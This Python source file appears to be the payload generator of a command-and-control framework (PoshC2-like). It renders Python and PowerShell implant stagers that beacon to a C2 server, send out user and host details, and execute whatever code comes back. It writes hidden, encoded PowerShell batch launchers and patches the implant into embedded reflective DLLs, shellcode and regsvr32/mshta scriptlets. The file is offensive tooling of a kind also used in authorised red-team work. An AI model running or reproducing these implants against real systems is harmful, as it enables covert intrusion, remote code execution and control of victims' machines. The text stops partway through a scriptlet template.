#!/usr/bin/env python
from Core import *
from Config import *
from Colours import *
import StringIO, gzip, io, base64, subprocess, os, hashlib, re
class Payloads(object):
quickstart = None
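def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
             Insecure, UserAgent, Referer, ConnectURL, BaseDirectory):
    """Capture the C2 connection settings and render the two stager templates.

    Besides storing the arguments on ``self``, this fixes the key the Python
    implant validates its AES module with (``PythonKey``) and the SHA-512 of
    that module (``PythonHash``): an existing ``<PayloadsDirectory>aes.py`` is
    reused so earlier implants keep validating, otherwise ``gen_key()`` makes a
    new key, which is stamped into a copy of ``<FilesDirectory>aes.py`` written
    to ``BaseDirectory``.  It then renders ``self.Python`` (OSX/Linux stager)
    and ``self.C2Core`` (PowerShell core).

    Everything handed in here ends up in clear text inside the generated
    artifacts -- in particular ``Key`` and ``Proxypass`` are interpolated
    verbatim into ``C2Core`` -- so treat the output directory as sensitive.

    Raises:
        ValueError: if an existing aes.py carries no ``#KEY...#KEY`` marker;
            the implant cannot be built with no key (previously this surfaced
            as a NameError on ``keyfound``).
    """
    self.KillDate = KillDate
    self.Key = Key
    self.DomainFrontHeader = Domainfrontheader
    self.HostnameIP = HostnameIP
    self.Serverport = Serverport
    self.Proxyuser = Proxyuser
    self.Proxypass = Proxypass
    self.Proxyurl = Proxyurl
    self.Proxy = Proxy
    self.ImplantType = ImplantType
    self.Insecure = Insecure
    self.UserAgent = UserAgent
    self.Referer = Referer
    self.ConnectURL = ConnectURL
    self.BaseDirectory = BaseDirectory
    served_aes = "%saes.py" % PayloadsDirectory
    if os.path.exists(served_aes):
        # Reuse the key already stamped into the served module so that the
        # hash/key pair stays consistent with implants generated earlier.
        with open(served_aes, 'rb') as f:
            content = f.read()
        m = re.search('#KEY(.+?)#KEY', content)
        if not m:
            raise ValueError("%s exists but carries no #KEY...#KEY marker" % served_aes)
        self.PythonHash = hashlib.sha512(content).hexdigest()
        self.PythonKey = m.group(1)
    else:
        self.PythonKey = gen_key()
        with open("%saes.py" % FilesDirectory, 'rb') as f:
            content = f.read()
        aespy = content.replace("#REPLACEKEY#", "#KEY%s#KEY" % self.PythonKey)
        with open("%saes.py" % self.BaseDirectory, 'w') as output_file:
            output_file.write(aespy)
        # NOTE(review): the hash covers the in-memory text; if text-mode 'w'
        # rewrites newlines on the host platform, the file on disk would not
        # match it -- confirm the served copy hashes to PythonHash.
        self.PythonHash = hashlib.sha512(aespy).hexdigest()
    # OSX/Linux stager.  The rendered script: disables TLS certificate
    # verification (ssl._create_unverified_context); fetches the hex-encoded
    # AES module from the "_py" quick-command URL and exec()s it only if the
    # embedded key is present, its SHA-512 matches pyhash and the kill date
    # has not passed; then posts an encrypted SessionID to the "?m" URL and
    # exec()s the decrypted reply.  "%%" is a literal "%" in the template.
    self.Python = """import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
kd=time.strptime("%s","%%d/%%m/%%Y")
pyhash="%s"
pykey="%s"
key="%s"
serverclean="%s"
url="%s"
url2="%s"
hh="%s"
ua="%s"
cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y")
ssl._create_default_https_context=ssl._create_unverified_context
if hh: r=urllib2.Request(url,headers={'Host':hh,'User-agent':ua})
else: r=urllib2.Request(url,headers={'User-agent':ua})
res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex")
s=hashlib.sha512(b)
if pykey in b and pyhash == s.hexdigest() and cstr < kd: exec(b)
else: sys.exit(0)
un=pwd.getpwuid( os.getuid() )[ 0 ];pid=os.getpid()
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%%s;%%s;%%s;%%s;%%s;%%s' %% (un,hn,hn,arch,pid,serverclean))
if hh:r=urllib2.Request(url2,headers={'Host':hh,'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');exec(x)
""" % (self.KillDate,self.PythonHash,self.PythonKey,self.Key,(self.HostnameIP+":"+self.Serverport),(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"),(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"),self.DomainFrontHeader,self.UserAgent)
    # PowerShell core.  CAM builds AES-256-CBC with PaddingMode.Zeros (hence
    # the rstrip of NULs on the Python side); ENC prepends the IV .NET
    # generates, DEC reads it back from the first 16 bytes.  Nothing here
    # authenticates the ciphertext (no MAC/tag): the only sanity check on
    # the decrypted first stage is the `$p -like "*key*"` test in primer.
    # Get-Webclient enforces the kill date, configures the proxy (with the
    # clear-text proxy credentials), the Host header used for domain
    # fronting, User-Agent, Referer and the SessionID cookie.  The leading
    # %s is filled from Insecure -- presumably the TLS-validation override;
    # confirm against the caller.
    self.C2Core = """%s
$sc="%s"
$s="%s"
function CAM ($key,$IV){
try {$a = New-Object "System.Security.Cryptography.RijndaelManaged"
} catch {$a = New-Object "System.Security.Cryptography.AesCryptoServiceProvider"}
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$a.BlockSize = 128
$a.KeySize = 256
if ($IV)
{
if ($IV.getType().Name -eq "String")
{$a.IV = [System.Convert]::FromBase64String($IV)}
else
{$a.IV = $IV}
}
if ($key)
{
if ($key.getType().Name -eq "String")
{$a.Key = [System.Convert]::FromBase64String($key)}
else
{$a.Key = $key}
}
$a}
function ENC ($key,$un){
$b = [System.Text.Encoding]::UTF8.GetBytes($un)
$a = CAM $key
$e = $a.CreateEncryptor()
$f = $e.TransformFinalBlock($b, 0, $b.Length)
[byte[]] $p = $a.IV + $f
[System.Convert]::ToBase64String($p)
}
function DEC ($key,$enc){
$b = [System.Convert]::FromBase64String($enc)
$IV = $b[0..15]
$a = CAM $key $IV
$d = $a.CreateDecryptor()
$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)
[System.Text.Encoding]::UTF8.GetString($u)}
function Get-Webclient ($Cookie) {
$d = (Get-Date -Format "dd/MM/yyyy");
$d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
$k = [datetime]::ParseExact("%s","dd/MM/yyyy",$null);
if ($k -lt $d) {exit}
$username = "%s"
$password = "%s"
$proxyurl = "%s"
$wc = New-Object System.Net.WebClient;
%s
$h="%s"
if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
elseif($h){$script:s="https://$($h)%s";$script:sc="https://$($h)"}
$wc.Headers.Add("User-Agent","%s")
$wc.Headers.Add("Referer","%s")
if ($proxyurl) {
$wp = New-Object System.Net.WebProxy($proxyurl,$true);
if ($username -and $password) {
$PSS = ConvertTo-SecureString $password -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $username,$PSS;
$wp.Credentials = $getcreds;
} else { $wc.UseDefaultCredentials = $true; }
$wc.Proxy = $wp; } else {
$wc.UseDefaultCredentials = $true;
$wc.Proxy.Credentials = $wc.Credentials;
} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
$wc }
function primer {
try{$u=([Security.Principal.WindowsIdentity]::GetCurrent()).name} catch{if ($env:username -eq "$($env:computername)$"){}else{$u=$env:username}}
$o="$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;%s"
try {$pp=enc -key %s -un $o} catch {$pp="ERROR"}
$primer = (Get-Webclient -Cookie $pp).downloadstring($s)
$p = dec -key %s -enc $primer
if ($p -like "*key*") {$p| iex}
}
try {primer} catch {}
Start-Sleep 300
try {primer} catch {}
Start-Sleep 600
try {primer} catch {}""" % (self.Insecure,(self.HostnameIP+":"+self.Serverport),
    (self.HostnameIP+":"+self.Serverport+self.ConnectURL+self.ImplantType),self.KillDate, self.Proxyuser,self.Proxypass,
    self.Proxyurl,self.Proxy,self.DomainFrontHeader,self.ConnectURL,self.UserAgent,self.Referer,
    (self.HostnameIP+":"+self.Serverport),self.Key,self.Key)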
def QuickstartLog( self, txt ):
if not self.quickstart: self.quickstart = ''
print txt
self.quickstart += txt + '\n'
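def WriteQuickstart(self, path):
    """Dump the accumulated quickstart log to *path* and report where it went.

    ``Colours.END`` is appended so a terminal colour left open by the last
    logged line is reset.  Nothing having been logged yet (``quickstart``
    still ``None``) writes just the reset sequence instead of failing with a
    TypeError on ``None + str``.

    Args:
        path: file to (over)write.
    """
    with open(path, 'w') as f:
        f.write((self.quickstart or '') + Colours.END)
    print('')
    print('Quickstart written to ' + path)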
def CreateRawBase(self, full=False):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
if full:
return batfile
else:
return base64.b64encode(b64gzip.encode('UTF-16LE'))
def CreateRaw(self, name=""):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
filename = "%s%spayload.txt" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(self.C2Core )
output_file.close()
self.QuickstartLog( "Raw Payload written to: %s" % filename )
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
filename = "%s%spayload.bat" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(batfile)
output_file.close()
self.QuickstartLog( "Batch Payload written to: %s" % filename )
def PatchDll(self, filename, dll, offset, name):
filename = "%s%s" % (self.BaseDirectory,filename)
output_file = open(filename, 'wb')
output_file.write(base64.b64decode(dll))
output_file.close()
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(\"%s\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
patchlen = 16000 - len((base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE'))
patch = (base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE')
patch2 = ""
patch2 = patch2.ljust( patchlen, '\x00' )
patch3 = "%s%s" % (patch,patch2)
f = open(filename, "r+b")
f.seek(offset)
f.write(patch3)
f.close()
self.QuickstartLog( "%s Payload written to: %s" % (name, filename) )
def CreateDlls(self, name=""):
# Load CLR "v2.0.50727"
self.QuickstartLog( "" + Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc2)" + Colours.GREEN )
v2_86 = "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
self.PatchDll("%sPosh_v2_x86.dll" % name, v2_86, 0x00012D80, "DLL")
v2_64 = "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
self.PatchDll("%sPosh_v2_x64.dll" % name, v2_64, 0x00014D00, "DLL")
# Load CLR "v4.0.30319"
self.QuickstartLog( "" + Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc)" + Colours.GREEN )
v4_86 = "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
self.PatchDll("%sPosh_v4_x86.dll" % name, v4_86, 0x00012F80, "DLL")
v4_64 = "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
self.PatchDll("%sPosh_v4_x64.dll" % name, v4_64, 0x00014F00, "DLL")
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "RunDLL Example:"+Colours.GREEN )
self.QuickstartLog( "rundll32 Posh_x64.dll,VoidFunc" )
def CreateShellcode(self, name=""):
# Load CLR "v2.0.50727"
self.QuickstartLog( ""+Colours.END )
self.QuickstartLog( "Shellcode that loads CLR v2.0.50727"+Colours.GREEN )
v2_86_offset = 0x000130E0 + 4
v2_86 = "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
self.PatchDll("%sPosh_v2_x86_Shellcode.bin" % name, v2_86, v2_86_offset, "Shellcode")
v2_64_offset = 0x00015150 + 8
v2_64 = "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
self.PatchDll("%sPosh_v2_x64_Shellcode.bin" % name, v2_64, v2_64_offset, "Shellcode")
# Load CLR "v4.0.30319"
self.QuickstartLog( "" +Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v4.0.30319"+Colours.GREEN )
v4_86_offset = 0x000132E0 + 4
v4_86 = "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
self.PatchDll("%sPosh-shellcode_x86.bin" % name, v4_86, v4_86_offset, "Shellcode")
v4_64_offset = 0x00015350 + 8
v4_64 = "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
self.PatchDll("%sPosh-shellcode_x64.bin" % name, v4_64, v4_64_offset, "Shellcode")
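def CreateSCT(self):
    """Write the two scriptlet launchers and log the matching one-liners.

    ``rg_sct.xml`` is the VBScript form (regsvr32), ``cs_sct.xml`` the JScript
    form (mshta); both ShellExecute ``powershell -e`` with the base64 launcher
    from :meth:`CreateRawBase`.  The quickstart entries download and IEX the
    ``_bs`` stage from the C2 host; note that those one-liners set
    ``ServerCertificateValidationCallback = {$true}``, i.e. the stager accepts
    any TLS certificate.  The progid/classid in ``rg_sct.xml`` are fixed
    literals and so appear verbatim in every generated file.
    """
    basefile = self.CreateRawBase()
    raw1 = """<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="VBScript">
Dim ghgfhgfh
set ghgfhgfh = CreateObject("shell.application")
ghgfhgfh.ShellExecute "powershell.exe", " -exec bypass -Noninteractive -windowstyle hidden -e %s", "", "open", 0
</script>
</registration>
</scriptlet>
""" % basefile
    raw2 = """<sCrIptlEt><scRIPt>
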